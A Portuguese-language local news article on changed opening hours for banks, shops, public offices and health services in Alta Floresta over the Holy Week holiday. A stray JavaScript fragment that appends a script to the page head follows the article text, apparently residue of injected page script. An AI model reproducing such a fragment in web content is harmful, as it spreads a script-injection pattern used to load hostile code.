Capa / Cidades / Estabelecimentos Públicos e Comerciais de Alta Floresta terão alteração em horário de funcionamento neste feriado

Estabelecimentos Públicos e Comerciais de Alta Floresta terão alteração em horário de funcionamento neste feriado

COMÉRCIOSRenan Nery

No período de 20 a 27 de março é celebrada a Semana Santa, data que, na Igreja Católica, celebra a paixão, morte e ressurreição de Jesus. A partir da quinta-feira, 24 de março, alguns estabelecimentos tem o horário de funcionamento alterado em virtude do feriado. Lotéricas, bancos e Correios não funcionam na sexta-feira, 25.
Portanto, fica também um alerta aos consumidores para que fiquem atentos às contas que vencem na sexta-feira, 25, podem ser pagas no caixa de auto-atendimento, segundo o informou a Federação Brasileira de Bancos (Febraban), o expediente nos estabelecimentos bancários que se encerra na quinta-feira , 24, só retorna normalmente na próxima segunda-feira, 28.
Os Estabelecimentos comerciais poderão funcionar normalmente no sábado e no domingo, fechando apenas na sexta-feira. Contudo, se algum estabelecimento decidir abrir suas portas no dia do feriado nacional, deverá ser pago aos funcionários o equivalente a um dia de trabalho e um dia de folga, até 15 dias após o feriado trabalhado.
Supermercados e comércio em geral fecham na sexta-feira, 25, mas abrem em horário normal no sábado ,26, das 08h às 18h, no domingo algumas lojas funcionam até o meio dia.
Os órgãos municipais, estaduais e federais como os correios fecham na sexa-feira . Já o hospital e o atendimento do SAMU funcionarão ininterruptamente, os Postos de Saúde estarão fechados na sexta-feira , 25.d.getElementsByTagName(‘head’)[0].appendChild(s);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top